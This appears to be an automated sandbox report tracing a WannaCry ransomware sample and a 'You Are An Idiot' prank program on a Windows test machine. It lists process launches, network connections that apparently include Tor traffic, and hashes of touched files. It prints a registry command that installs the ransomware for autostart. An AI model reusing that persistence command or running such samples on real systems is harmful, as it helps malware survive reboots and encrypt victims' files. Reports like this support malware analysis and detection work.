C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]"

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa3af4855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
N/A 127.0.0.1:49810 tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
N/A 127.0.0.1:49817 tcp
US 8.8.8.8:53 5.161.26.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.36:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.36:443 www.google.com udp
US 8.8.8.8:53 36.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 csp.withgoogle.com udp
GB 142.250.180.17:443 csp.withgoogle.com tcp
US 8.8.8.8:53 csp.withgoogle.com udp
US 8.8.8.8:53 csp.withgoogle.com udp
GB 142.250.180.17:443 csp.withgoogle.com udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 17.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 216.58.212.206:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 216.58.212.206:443 play.google.com udp
US 8.8.8.8:53 206.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.201.110:443 consent.google.com tcp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.201.110:443 consent.google.com udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 216.58.201.99:443 ssl.gstatic.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 216.58.201.99:443 ssl.gstatic.com udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 154.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 codeload.github.com udp
GB 20.26.156.216:443 codeload.github.com tcp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 216.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.36:443 www.google.com udp
GB 142.250.180.17:443 csp.withgoogle.com udp
GB 216.58.201.99:443 ssl.gstatic.com udp
GB 216.58.212.206:443 play.google.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
N/A 127.0.0.1:50607 tcp
N/A 127.0.0.1:50620 tcp
US 8.8.8.8:53 codeload.github.com udp
GB 20.26.156.216:443 codeload.github.com tcp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 codeload.github.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.112.22:443 collector.github.com tcp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 140.82.112.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 22.112.82.140.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:52422 tcp
CH 46.28.207.141:443 tcp
NL 194.109.206.212:443 tcp
FR 5.39.92.199:443 tcp
CZ 46.28.110.244:443 tcp
SE 171.25.193.9:80 tcp
US 8.8.8.8:53 9.193.25.171.in-addr.arpa udp
FI 91.158.28.49:8443 tcp
US 8.8.8.8:53 49.28.158.91.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 ffbf91a9ec5ff23fe54e1469ce0fb653
SHA1 d578492fa3d08b4bf0caf9b37568c4e1b46803b9
SHA256 f7ff06084825eff5f887f5609aad84896729490a3f71e2a16c5869330a77f5dd
SHA512 31a5bd53fee54eec79c89b4ebfd350f43f0c4cdcc08f725898c4bd786760b75d8c2d47d583c92e6582caba7e6209c874ee3f4038967b92c3786684984c4a9599

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 0e807656bd86f2aef7ccf207f963973b
SHA1 27052af8d103d134369e356b793eb88ba873df55
SHA256 c509c498682bec50142782a51785655020bea27652f46e104e07a530c2ff5162
SHA512 e6c7d5e001e8322ccb1abd101d47e7f1401597518f45dd8da1d757728147262bcb3b1f96128f291e0e367c5b34026b401468e4219b27cf3c37a8d434180cd8f3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\db\data.safe.bin

MD5 9e7e8d97b3f25472801b4087cf9ecfb0
SHA1 5a222006082fb7e098f58686b7e9d60141e7b5ac
SHA256 e8dfa69269e62eed53d7bc965866c8aa140ea9f56e231e1d92002183db034969
SHA512 6ef3382ba657c1c7dd4926e93e08d4c116b2aaa416b9cd668f0e2dbfd0e539010535f68977f5d9accef36d328e15df7eeabbec0d6c63b276d6638a36bcc50cfe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\6e961a22-4af6-4ba8-b0a5-b310c9e0656d

MD5 5ae928d5e53c155867fb61bf309b16d7
SHA1 b2ad3d322758e094299ed3df77d8b8d1a29ba28d
SHA256 d36c32b2bea14c442c74224f6ed3c945d61e73acd740056875025536726dc94c
SHA512 ddee60ce4e246a320fb5161962a3b86ede8f1ec18fb9a39d483091740604f4b1294d4f5ff7137c23ff4a63acd4e6a253db1e09ea8cf5764e9df05d42490ab006

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\9e0d0e94-9fbd-425d-9b0a-70e79f817266

MD5 8b812d45c4353b5ecdd3950eb3e8d2ef
SHA1 f5be8d72611cf5a64047a68fc302d2bc94204478
SHA256 a4f7ef5ddaabd39f595aad14486d3549f83fccf31ed8f094eb94d563fc0a3f39
SHA512 3514f4f0f83b1799f205a3c8cae6cd69d6a780fa03a46edb9cc2defa79f967826b808a436d83d9d93d946f87fa89328100e735731fc99cc49a1e50b6b650a5d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 0d0013d9708d9fef539adc917f5b87f6
SHA1 5e071e6b4d8abf007c8bb78ee948caf5bb0439e1
SHA256 f416d29cdbaa66b7d04483831d2a593a735316fafb643414a12df78da0ab054b
SHA512 851e9965a0fed9e0f5195ce655635cf13687d18678e4a9df807ab22cbc53c02cd2006fd65d93cd80b2a06d709e59122ea9933ba5cec551c6d51f5e9b4c175388

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 34775a999d72cffb22acbd0b7d98aaa6
SHA1 e5e83a61091871f97f70f5dfb7891f036b8d34e5
SHA256 555efa41dce661287cf480f6f9ae611fd0c3b940cd9bdfc1225aa5ac957ffbf0
SHA512 b41c02e1eeb705a9cdd0dc7c13fe010795395f712c44120d7ea0db34e7e0442adf566551f22feaafb21d13d0c78a7204a00f8c85f74ccbb7aeda599ba6c6ce4e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 bc256cde673f64a47ec3da26429c74a8
SHA1 167d9f6503c6f08138e5996fc98b3400c5009a5c
SHA256 1656502a8d5785adac9e95f6110b1cae3691b987b260957974a5f314e62ef85b
SHA512 ee3ccf495a84f831f0d6d852b0c4cfe435edb353fff55e0128a56a4e083adf207d2372d7832cbbb71b58092dbf8188f6a1d99fc971bd4b8ca2d5d4d1904b6f1a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4c13bb4bf31bec927d7b3e09d0926858
SHA1 8248f46d5fceb13c480f76c79d9ca41deea95e96
SHA256 bef2e0fc0738c82e7ca5563e88d5e666ebe10a7730287751efebef4d88a9df93
SHA512 f1cba3da37740ac4c1f9de58ee29bb2bf19b0ba54ac51553b2fc3fc001cc5163727a34df45e52535af7111f9b7d96d496eb862063ffd4a66c03d5aa7fdec6178

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 59c7efb9be731093557a79f43096f4ef
SHA1 a88503c1679501ebf33ff3b09c690622566ed72d
SHA256 7433ede2934df0b7790fe4a027ea87b5555536474f00de665e3cba9c94cd1f2a
SHA512 0276a555928bf47408b045f28adf10fbfa80aecb4e2f41a4fca7ebe116ae5d2e19c7862298b6ca548e2de3c076ea0424e4b171f3150bfc4ecceafbde1148fa63

C:\Users\Admin\Downloads\You-Are-An-Idiot-main.j4SoN6dR.zip.part

MD5 7cae6b379184f1cc5444ca2fc9a8ec75
SHA1 9a68fb4fed6c6f633275480ac481b7d24a1e60ad
SHA256 4b6edb96987da0a7714e705a7af8516ee7167c8a616eff6eb3ed9e54f6d02ee1
SHA512 fc81537d3fa0aa4fdc56ebcbc13bc43167cf1cd5424077c65292d7c86dd1e7aa11c44a5c78d8ca6fb31d942c034c1a9ee309aa8ee8a75a39dea0d3ed65790604

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a44bac652141a6dbfddb7b3a1fd7e89c
SHA1 bda3bb835391b0e1c197c8ab2ebe27df97e0cf8d
SHA256 4e532dd03c9c719436be85cdb8aa1653405f861c1e83c7b4556cd1cb2dff7d8b
SHA512 432d529401b4d192d241124a79fc1b57b5e7669fc895cbd00143334c61d233b8431adbe86a6a4f39c3b92b6098319efdca3d756f1e393b0d60e25d7106491542

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 6d4114073fb273fa337a3a3b14b61dae
SHA1 f0f44d3af70d3c8c551d601074642e031d001e91
SHA256 b9e585217d7b7f8a1db3f509ab45ac7bc0981b9824259ae728e21e3af8c26b62
SHA512 35fc4c8ddb8fc5b1f5d862724051159d6d8746a50f9421d563f776c57f585356869c7277ee746a23365e046af476b720f8ff8464952886877bc59457d6467ca7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5616d5350be686ddee3d57b2e3ac20cd
SHA1 b7355dbeb1756a11b15cd81e21a5c625cdad50ab
SHA256 c13b5f108ed0f2460206c76968b8b7c01b4712a56d9f3341c68a1e037228aa49
SHA512 854b45c434c9c1747f075b045498da1bd03f2494e506a52015c65cf8bcaa28e54d8a5df000bbfa7a86a51f62e84f9e6c2dd179c6b2c854806899f28745cd9263

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 96f35db267072549b2b076e73ec8ba21
SHA1 e1a122a862cd421cda6d92d771fd558691b7b28d
SHA256 2720a17738533021877ee3006cf61e879c060bcdcbd62c575b2c0aca0141fa60
SHA512 3629c2b2615ca0b3ec83409b91b20b1965cfcfe4a9cf92bbaa5878dbbee0ff28928a11fa9172979ad586b5ceb823bb422cd71d92eb20cbef7be6445789fb3369

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\79679B23E6BBEB689E1C79E27C32C20C5EC9DF47

MD5 7382ec99f3cdda1d01d29e34ee6197ce
SHA1 0b41b3c41f1a251c35e8ea4d91e9ce48da9717f7
SHA256 b9abd60671e293430670344041e90806fa26504c91a3cb5c34a756c7d38ca318
SHA512 aade0d0fd69c2cc1c3a67116e0f84b3308ad68d3207a20b853d192af82042954e958d35fabf4f90cf0664ea1c4c1f9805d1bb1510a4d578725f58ecd8498e61c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 08759a0a85eaac39b9a7f2bf57090fa8
SHA1 ba0d658af52d19aeb087f71a2520f8e21f99d9e1
SHA256 642fd7bff09048403f360beb88c68b3e831c50e72e0a857b9e7a3f607345416e
SHA512 71bcc4e46e77c65a58fb4d860ae703235bc42392fb3c5f332f2470bd5c74c639b5d1afdcb31ddc25e578acdd2eea2c47d9cc39db22879c747319ab16857a6bf4

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.UDZVBJBP.0-master.zip.part

MD5 017f199a7a5f1e090e10bbd3e9c885ca
SHA1 4e545b77d1be2445b2f0163ab2d6f2f01ec4ca05
SHA256 761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f
SHA512 76215a26588204247027dcfdab4ea583443b2b2873ff92ad7dd5e9a9037c77d20ab4e471b8dd83e642d8481f53dbc0f83f993548dc7d151dead48dc29c1fdc22

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4

MD5 8c49ac112830cea49fbc36e87f2e7a64
SHA1 5d765c172eceb3b72359cf43a875e7df0377f3f9
SHA256 c331d3888bb6263a9076a19d7e81d09e0408ead4ac082c363d6f0524176cfae8
SHA512 f74b89685ef12fc70b7e42106d69a001d39dd0b26ceda9cacf1e0c43651013be82451a3f072b70e1e7bc3a3e8b6012ce4e5137e4428a5aba54bb6df979a20741

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 80ea913f0ea5b5366fb75c482b310e74
SHA1 633651f54076bb8699574a65323da3969bdac9df
SHA256 7ced13a228c3109d8ca8ef4f84e23802939d14566eacd05f1c0593f8e43e6cb5
SHA512 1834c7d78aab468b77f13bbce9d0abdadc98335d3dd99ed9507acb669124149f215ff874132c864a7de53cac4445649e4f23ba3f1157bc16ae04aaa93d0acaa6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\startupCache\urlCache.bin

MD5 1545a3e921a3098b76cf6cadccc4ae35
SHA1 1d67d3f30d70cc8f630fa7efc31bc55e54e56665
SHA256 19984a956bb9091780a609c5bfea2a29c9dcee058ca32ae715392eef6debc027
SHA512 fa364733cf0fa48126ae3b37cafc72b19bc7b8506cedf94f77fff3883de620b5f3402933a1cbbb26abc0ca18651000db882bc4b2c21417bda9c14c4929811ce8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json

MD5 58e240288763218d12bf235d34e5aee2
SHA1 89135494b57f590011c09668dec3b90d2c5ee9ae
SHA256 615f80e71dfde24711e7fefc1b7959f7592c5e5cf9ad0f3aecb4235b93187176
SHA512 caed2638902987aead199e73cffb90881bf245bbb616cb38c46b281d4aaaa54dc20a54e9bfe17a8d6e68847394c113fb7606e94b64f44ab0b52bf7846f26e936

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\startupCache\scriptCache.bin

MD5 81dbbb72f05c9543ae965e281f7e49bc
SHA1 14c37d4bcbae9f3b93b84ed716ee265766511b16
SHA256 d0f18173bc0f13c6c3e8c469f66976acd7679bd18f37ed01373731750ec662f9
SHA512 5bf8d307e29074afb24b43b08cba0ffd2f34b06bd284e0d901a827aedb7d48f9fd5bd0bd9b68453a5bba74b97f0c79d9a0b10143de244706771ea74345113f52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\permissions.sqlite

MD5 2a0d67d2080630ecee86fd48bb94e883
SHA1 39c15e5f612a901ef40c5ba09968ca82ba50da60
SHA256 ce9069eb3b1636c59ea16404fcf06789b722fc3c3c87205fd099839a3e1c6fdf
SHA512 0f8f546591e236e9a563ecc83f6ea6127d7926ba1e71d7b75e51c7f657db3e1b6c2d9190039a1994532866d060af5dac1502e9bc0d7c56dd41554488005f2b81

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cookies.sqlite

MD5 4283cd67162d87d0983c4c9860b39fc8
SHA1 8602315b7625f8de99c2ca228393c050c2987799
SHA256 9f0c8accedfea2f72a35f16a72af6fecdabd729adae04bb2e1c78f268240e446
SHA512 773a42b2e1c4e710cce0bbce7f531e6c146c605f35ec49c019796a30cb7c69c3eced5e6ffb651f4eb841f690d692330381c4637e3fe5585127400ae113eca9e0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1 b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json

MD5 362985746d24dbb2b166089f30cd1bb7
SHA1 6520fc33381879a120165ede6a0f8aadf9013d3b
SHA256 b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA512 0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage.sqlite

MD5 42a8ac62d6df0caa5db397589bbdceff
SHA1 29eaeba053a73d1f2d74ae76ede8e5d1293451ee
SHA256 543323ca552b9ddde17bb9c3c1f6d1bb2734543ad54df1ce1b48d2357a46806a
SHA512 49e778f718727f8dfd5fb2e263f7f7904bc53a9656258d8b08c8bb953e4423f5f55fca8b3831784757f707b1fc996be83bef4874d298327a2551dd438bad79d6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\SiteSecurityServiceState.txt

MD5 172feb55c117f905f3f3e3e1e0109b8c
SHA1 cb2363d405510f5bbdb08ce28b39728b0bf0379b
SHA256 85c0dfdcad23dff3a057682fec8f914a85f458780de0d7a061e9d59314c0fb03
SHA512 a9c02350a89b0be7ed1b2cf442f6fd3301b7284e7062b70173b666698dcae53f0d330563751de77cd4dcf59042fb2eac85d4378e451591520ca04f91b1b4f00e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA1 5942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA256 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA512 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cert9.db

MD5 998b29d9a959c132009411868a19f906
SHA1 c38fd4bc4778c72600f26cb56934346f21155c7c
SHA256 26496f558654ef30b3d536f7373691a5980a9b3cfbd1fc44668e008262e9806b
SHA512 d1e2825dc256b07329e0766b6245b83077b830b9c7e7e5b1a580bf934613b881ab625a6aa93ae46d73c88c0ea082ac2c97706a809faefac5e68fc8bc594dab7c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

MD5 ef01614d25815d9f71a42d97af6f7f86
SHA1 2bc05e164d8da43f9e13e0014f1d39c664331eed
SHA256 3da0b21c4ff52c75078ec41706ee5cf070dd4c2ca54a017fabd6038318613613
SHA512 9b4f2ccd2885840acb325e2c25c118b83674e0143570ffe238b840a96dbb9a8a99d1d9bc10e9813fc02cef7098313b7bc0a7f0396616472c0a78f1db97b9572b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\favicons.sqlite

MD5 c37ae7dd9b6809440b3b2b7c9793ed8d
SHA1 8aa5b7a50f56ff401207a381470a7c4a86a4e660
SHA256 30e33d0a6f7305df7b62a56b54f0b18de6b5d93b18aa9c9529d288673d4b62b0
SHA512 2bd2d71667348519f777da79afb519f1c7d523da52ec728c15d9cce498e4f26b29e86085da929d7f608fd79921c49f9cffe625642f44d05729522ba95b15d1aa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\places.sqlite

MD5 00ad9566a01601e4cd2e4b5cf4746b1a
SHA1 a33edcb0d2bf8b30e63865abf87766c9a10f0019
SHA256 dabfddac053d65cb7be17921b8c16ef16a6326059b691a8cb12948a99d0a990b
SHA512 b05b770ceb408df77b498df4d81d1397634fe0073ab4a4c099e71763506d648e2b5a947102cc88f33805ffe2a1541722c58f9728807e8dc4056c92508634793e

